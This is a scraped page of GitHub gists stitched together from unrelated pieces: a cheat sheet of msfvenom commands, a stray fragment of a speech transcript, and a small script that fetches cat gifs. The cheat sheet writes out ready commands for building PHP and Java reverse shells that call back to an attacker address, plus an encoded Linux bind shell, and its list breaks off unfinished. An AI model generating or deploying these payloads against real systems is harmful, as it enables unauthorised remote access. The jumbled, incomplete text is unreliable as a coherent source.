Skip to content

Instantly share code, notes, and snippets.

View CoopTRUE's full-sized avatar
🐈
Coolin

Coop CoopTRUE

🐈
Coolin
View GitHub Profile
@dejisec
dejisec / msf_pay.md
Created July 15, 2020 20:08
MSFVenom Payloads

PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

Java WAR reverse shell

msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

Linux bind shell

msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Linux FreeBSD reverse shell

2070 Paradigm Shift Transcript
Transcribed by Edwin Finch
Sam, you're a legend. Enjoy
==============================
Whew.
Hey.
@captdan
captdan / catimg.sh
Last active November 22, 2022 08:31
Output a random cat gif in iTerm2
#!/bin/bash
curl -Ls "http://thecatapi.com/api/images/get?format=src&type=gif&api_key=$THE_CAT_API_KEY" | imgcat